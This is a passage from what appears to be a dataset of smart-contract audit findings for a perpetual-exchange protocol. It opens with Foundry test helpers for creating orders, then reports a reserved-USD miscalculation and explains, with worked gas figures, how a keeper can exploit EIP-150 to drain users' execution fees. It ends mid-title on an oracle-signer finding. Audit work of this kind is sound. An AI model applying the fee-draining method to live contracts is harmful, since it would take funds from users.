<< 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n \\n // 3 signers and 6 tokens, so we need 3*6 signatures\\n bytes[] memory signatures = new bytes[](18);\\n for(uint i; i<18; i++){\\n signatures[i] = abi.encode(\"SIGNATURE\");\\n }\\n address[] memory priceFeedTokens;\\n\\n OracleUtils.SetPricesParams memory priceParams = OracleUtils.SetPricesParams(\\n signerInfo,\\n tokens,\\n compactedMinOracleBlockNumbers,\\n compactedMaxOracleBlockNumbers,\\n compactedOracleTimestamps,\\n compactedDecimals,\\n compactedMinPrices, \\n compactedMinPricesIndexes,\\n compactedMaxPrices, \\n compactedMaxPricesIndexes, \\n signatures, \\n 
priceFeedTokens\\n );\\n return priceParams;\\n}\\n\\n/* \\n* The current index token price (85, 90), a trader sets a trigger price to 100 and then acceptabiel price to 95.\\n* He like to long the index token. \\n* 1. Pick the primary price 90 since we long, so choose the max\\n* 2. Make sure 90 < 100, and pick (90, 100) as the custom price since we long\\n* 3. Choose price 95 since 95 is within the range, and it is the highest acceptible price. Choosing 90 \\n* will be in favor of the trader\\n* \\n*/\\n\\nfunction createMarketSwapOrder(address account, address inputToken, uint256 inAmount) public returns(bytes32)\\n{ \\n address[] memory swapPath = new address[](1);\\n swapPath[0] = _marketProps1.marketToken;\\n // swapPath[0] = _marketPropsAB.marketToken;\\n // swapPath[1] = _marketPropsBC.marketToken;\\n // swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account; // the account is the receiver\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = account; // set myself as the ui receiver\\n // params.addresses.market = marketToken;\\n params.addresses.initialCollateralToken = inputToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n // params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n params.numbers.initialCollateralDeltaAmount = inAmount ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(inputToken).transfer(address(_orderVault), inAmount); // this is the real amount\\n\\n\\n // params.numbers.triggerPrice = triggerPrice;\\n // params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n // params.numbers.initialCollateralDeltaAmount = inAmount;\\n 
params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketSwap;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n // params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n}\\n\\n\\n\\nfunction createLiquidationOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n 
params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.Liquidation;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createStopLossDecrease(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n 
params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.StopLossDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createLimitDecreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower 
effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\nfunction createLimitIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice; // used for limit order\\n params.numbers.acceptablePrice = 121000000000000; // I can buy with 
this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\n\\nfunction createMarketDecreaseOrder(address account, address marketToken, address collateralToken, uint256 acceptablePrice, uint256 sizeInUsd, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeInUsd; // how much dollar to decrease, will convert into amt of tokens to decrease in long/short based on the execution price\\n params.numbers.initialCollateralDeltaAmount = 13e18; // this is actually useless, will be overidden by real transfer amount\\n // vm.prank(account); \\n // IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n 
params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 10e18; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createMarketIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n 
params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createWithdraw(address withdrawor, uint marketTokenAmount) public returns (bytes32)\\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(\"createWithdraw with withdrawor: \");\\n console.logAddress(withdrawor);\\n vm.prank(withdrawor); \\n _wnt.transfer(address(_withdrawalVault), 3200); // execution fee\\n\\n vm.prank(withdrawor);\\n ERC20(_marketProps1.marketToken).transfer(address(_withdrawalVault), marketTokenAmount);\\n\\n WithdrawalUtils.CreateWithdrawalParams memory params = WithdrawalUtils.CreateWithdrawalParams(\\n withdrawor, // receiver\\n address(0), // call back function\\n uiFeeReceiver, // uiFeeReceiver\\n _marketProps1.marketToken, // which market token to withdraw\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 123, // minLongTokenAmount\\n 134, // minShortTokenAmount\\n false, // shouldUnwrapNativeToken\\n 3200, // execution fee\\n 3200 // callback gas limit\\n );\\n\\n vm.prank(withdrawor);\\n bytes32 key = _erouter.createWithdrawal(params);\\n return key;\\n}\\n\\n\\nfunction createDepositNoSwap(Market.Props memory marketProps, address depositor, uint amount, bool isLong) public returns (bytes32){\\n address[] memory 
longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(\"createDeposit with depositor: \");\\n console.logAddress(depositor);\\n\\n vm.prank(depositor);\\n _wnt.transfer(address(_depositVault), 3200); // execution fee\\n if(isLong){\\n console2.log(\"000000000000000000\");\\n vm.prank(depositor);\\n IERC20(marketProps.longToken).transfer(address(_depositVault), amount); \\n console2.log(\"bbbbbbbbbbbbbbbbbbbbbb\");\\n }\\n else {\\n console2.log(\"111111111111111111111111\");\\n console2.log(\"deposit balance: %d, %d\", IERC20(marketProps.shortToken).balanceOf(depositor), amount);\\n vm.prank(depositor);\\n IERC20(marketProps.shortToken).transfer(address(_depositVault), amount);\\n console2.log(\"qqqqqqqqqqqqqqqqqq\");\\n }\\n \\n\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n depositor,\\n address(0),\\n uiFeeReceiver,\\n marketProps.marketToken,\\n marketProps.longToken,\\n marketProps.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n console2.log(\"aaaaaaaaaaaaaaaaaaaaaaaaa\");\\n vm.prank(depositor);\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n return key1;\\n}\\n\\n/*\\nfunction testCancelDeposit() public \\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n address(_wnt).call{value: 100e8}(\"\");\\n _wnt.transfer(address(_depositVault), 1e6);\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n msg.sender,\\n address(0),\\n address(111),\\n _marketProps1.marketToken,\\n _marketProps1.longToken,\\n _marketProps1.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n console.log(\"WNT balance of address(222) before cancelllation: %s\", 
_wnt.balanceOf(address(222)));\\n console.log(\"WNT balance of address(this) before cancelllation: %s\", _wnt.balanceOf(address(this))); \\n\\n _roleStore.grantRole(address(222), Role.CONTROLLER); // to save a market's props\\n vm.prank(address(222));\\n _depositHandler.cancelDeposit(key1);\\n console.log(\"WNT balance of address(222) after cancelllation: %s\", _wnt.balanceOf(address(222)));\\n console.log(\"WNT balance of address(this) after cancelllation: %s\", _wnt.balanceOf(address(this))); \\n}\\n*/\\n\\nfunction testERC165() public{\\n bool yes = _wnt.supportsInterface(type(IWNT).interfaceId);\\n console2.log(\"wnt suppports deposit?\");\\n console2.logBool(yes);\\n vm.expectRevert();\\n yes = IERC165(address(_sol)).supportsInterface(type(IWNT).interfaceId);\\n console2.logBool(yes);\\n\\n if(ERC165Checker.supportsERC165(address(_wnt))){\\n console2.log(\"_wnt supports ERC165\");\\n }\\n if(ERC165Checker.supportsERC165(address(_sol))){\\n console2.log(\"_sol supports ERC165\");\\n }\\n}\\n\\n function justError() external {\\n // revert Unauthorized(\"abcdefg\"); // 973d02cb\\n // revert(\"abcdefg\"); // 0x08c379a, Error selector\\n // require(false, \"abcdefg\"); // 0x08ce79a, Error selector\\n assert(3 == 4); // Panic: 0x4e487b71\\n }\\n\\n function testErrorMessage() public{\\n\\n try this.justError(){} \\n catch (bytes memory reasonBytes) {\\n (string memory msg, bool ok ) = ErrorUtils.getRevertMessage(reasonBytes);\\n console2.log(\"Error Message: \"); console2.logString(msg);\\n console2.log(\"error?\"); console2.logBool(ok);\\n } \\n }\\n\\n \\n function printAddresses() public{\\n console2.log(\"_orderVault:\"); console2.logAddress(address(_orderVault));\\n console2.log(\"marketToken:\"); console2.logAddress(address(_marketProps1.marketToken));\\n } \\n\\n function printPoolsAmounts() public{\\n console2.log(\"\\n The summary of pool amounts: \");\\n \\n uint256 amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.longToken);\\n 
console2.log(\"Market: _marketProps1, token: long/nwt, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.shortToken);\\n console2.log(\"Market: _marketProps1, token: short/USDC, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.longToken);\\n console2.log(\"Market: _marketPropsAB, token: long/A, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.shortToken);\\n console2.log(\"Market: _marketPropsAB, token: short/B, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.longToken);\\n console2.log(\"Market: _marketPropsBC, token: long/B, amount:%d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.shortToken);\\n console2.log(\"Market: _marketPropsBC, token: short/C, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.longToken);\\n console2.log(\"Market: _marketPropsCwnt, token: long/C, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.shortToken);\\n console2.log(\"Market: _marketPropsCwnt, token: short/wnt, amount: %d\", amount);\\n \\n\\n console2.log(\"\\n\");\\n }\\n \\n}\\n```\\n -short side of getReservedUsd does not work for market that has the same collateral tokenчmediumчshort side of getReservedUsd does not work for market that has the same collateral token\\nConsider the case of ETH / USD market with both long and short collateral token as ETH.\\nthe available amount to be reserved (ETH) would CHANGE with the price of ETH.\\n```\\n function getReservedUsd(\\n DataStore dataStore,\\n Market.Props memory market,\\n MarketPrices memory prices,\\n bool isLong\\n ) internal view returns (uint256) {\\n uint256 reservedUsd;\\n if (isLong) {\\n // for longs calculate the reserved USD based on 
the open interest and current indexTokenPrice\\n // this works well for e.g. an ETH / USD market with long collateral token as WETH\\n // the available amount to be reserved would scale with the price of ETH\\n // this also works for e.g. a SOL / USD market with long collateral token as WETH\\n // if the price of SOL increases more than the price of ETH, additional amounts would be\\n // automatically reserved\\n uint256 openInterestInTokens = getOpenInterestInTokens(dataStore, market, isLong);\\n reservedUsd = openInterestInTokens * prices.indexTokenPrice.max;\\n } else {\\n // for shorts use the open interest as the reserved USD value\\n // this works well for e.g. an ETH / USD market with short collateral token as USDC\\n // the available amount to be reserved would not change with the price of ETH\\n reservedUsd = getOpenInterest(dataStore, market, isLong);\\n }\\n\\n return reservedUsd;\\n }\\n```\\nчConsider apply both long and short calculations of reserveUsd with relation to the indexTokenPrice.чreservedUsd does not work when long and short collateral tokens are the same.ч```\\n function getReservedUsd(\\n DataStore dataStore,\\n Market.Props memory market,\\n MarketPrices memory prices,\\n bool isLong\\n ) internal view returns (uint256) {\\n uint256 reservedUsd;\\n if (isLong) {\\n // for longs calculate the reserved USD based on the open interest and current indexTokenPrice\\n // this works well for e.g. an ETH / USD market with long collateral token as WETH\\n // the available amount to be reserved would scale with the price of ETH\\n // this also works for e.g. 
a SOL / USD market with long collateral token as WETH\n // if the price of SOL increases more than the price of ETH, additional amounts would be\n // automatically reserved\n uint256 openInterestInTokens = getOpenInterestInTokens(dataStore, market, isLong);\n reservedUsd = openInterestInTokens * prices.indexTokenPrice.max;\n } else {\n // for shorts use the open interest as the reserved USD value\n // this works well for e.g. an ETH / USD market with short collateral token as USDC\n // the available amount to be reserved would not change with the price of ETH\n reservedUsd = getOpenInterest(dataStore, market, isLong);\n }\n\n return reservedUsd;\n }\n```\n -Keepers can steal additional execution fee from usersчmediumчThe implementation of `payExecutionFee()` didn't take EIP-150 into consideration; a malicious keeper can exploit it to drain out all execution fee users have paid, regardless of the actual execution cost.\nThe issue arises on `L55` of `payExecutionFee()`, as it's an `external` function, calling `payExecutionFee()` is subject to EIP-150. Only `63/64` gas is passed to the `GasUtils` sub-contract (external library), and the remaining `1/64` gas is reserved in the caller contract which will be refunded to keeper (msg.sender) after the execution of the whole transaction. 
But calculation of `gasUsed` includes this portion of the cost as well.\\n```\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external { // @audit external call is subject to EIP// Remove the line below\\n150\\n// Remove the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft();\\n// Add the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft() * 64 / 63; // @audit the correct formula\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if (executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee // Remove the line below\\n executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n );\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n```\\n\\nA malicious keeper can exploit this issue to drain out all execution fee, regardless of the actual execution cost. 
Let's take `executeDeposit()` operation as an example to show how it works:\\n```\\nFile: contracts\\exchange\\DepositHandler.sol\\n function executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender\\n ) {\\n } catch (bytes memory reasonBytes) {\\n// rest of code\\n }\\n }\\n\\nFile: contracts\\exchange\\DepositHandler.sol\\n function _executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams memory oracleParams,\\n address keeper\\n ) external onlySelf {\\n uint256 startingGas = gasleft();\\n// rest of code\\n\\n ExecuteDepositUtils.executeDeposit(params);\\n }\\n\\n\\nFile: contracts\\deposit\\ExecuteDepositUtils.sol\\n function executeDeposit(ExecuteDepositParams memory params) external {\\n// rest of code\\n\\n GasUtils.payExecutionFee(\\n params.dataStore,\\n params.eventEmitter,\\n params.depositVault,\\n deposit.executionFee(),\\n params.startingGas,\\n params.keeper,\\n deposit.account()\\n );\\n }\\n\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external {\\n uint256 gasUsed = startingGas - gasleft();\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if (executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee - executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n 
);\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n\\nFile: contracts\\gas\\GasUtils.sol\\n function adjustGasUsage(DataStore dataStore, uint256 gasUsed) internal view returns (uint256) {\\n// rest of code\\n uint256 baseGasLimit = dataStore.getUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT);\\n// rest of code\\n uint256 multiplierFactor = dataStore.getUint(Keys.EXECUTION_GAS_FEE_MULTIPLIER_FACTOR);\\n uint256 gasLimit = baseGasLimit + Precision.applyFactor(gasUsed, multiplierFactor);\\n return gasLimit;\\n }\\n```\\n\\nTo simplify the problem, given\\n```\\nEXECUTION_GAS_FEE_BASE_AMOUNT = 0\\nEXECUTION_GAS_FEE_MULTIPLIER_FACTOR = 1\\nexecutionFeeUserHasPaid = 200K Gwei\\ntx.gasprice = 1 Gwei\\nactualUsedGas = 100K\\n```\\n\\n`actualUsedGas` is the gas cost since startingGas(L146 of DepositHandler.sol) but before calling payExecutionFee()(L221 of ExecuteDepositUtils.sol)\\nLet's say, the keeper sets `tx.gaslimit` to make\\n```\\nstartingGas = 164K\\n```\\n\\nThen the calculation of `gasUsed`, L55 of `GasUtils.sol`, would be\\n```\\nuint256 gasUsed = startingGas - gasleft() = 164K - (164K - 100K) * 63 / 64 = 101K\\n```\\n\\nand\\n```\\nexecutionFeeForKeeper = 101K * tx.gasprice = 101K * 1 Gwei = 101K Gwei\\nrefundFeeForUser = 200K - 101K = 99K Gwei\\n```\\n\\nAs setting of `tx.gaslimit` doesn't affect the actual gas cost of the whole transaction, the excess gas will be refunded to `msg.sender`. Now, the keeper increases `tx.gaslimit` to make `startingGas = 6500K`, the calculation of `gasUsed` would be\\n```\\nuint256 gasUsed = startingGas - gasleft() = 6500K - (6500K - 100K) * 63 / 64 = 200K\\n```\\n\\nand\\n```\\nexecutionFeeForKeeper = 200K * tx.gasprice = 200K * 1 Gwei = 200K Gwei\\nrefundFeeForUser = 200K - 200K = 0 Gwei\\n```\\n\\nWe can see the keeper successfully drain out all execution fee, the user gets nothing refunded.чThe description in `Vulnerability Detail` section has been simplified. 
In fact, `gasleft` value should be adjusted after each external call during the whole call stack, not just in `payExecutionFee()`.чKeepers can steal additional execution fee from users.ч```\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external { // @audit external call is subject to EIP// Remove the line below\\n150\\n// Remove the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft();\\n// Add the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft() * 64 / 63; // @audit the correct formula\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if (executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee // Remove the line below\\n executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n );\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n```\\n -An Oracle Signer can never be removed even if he becomes 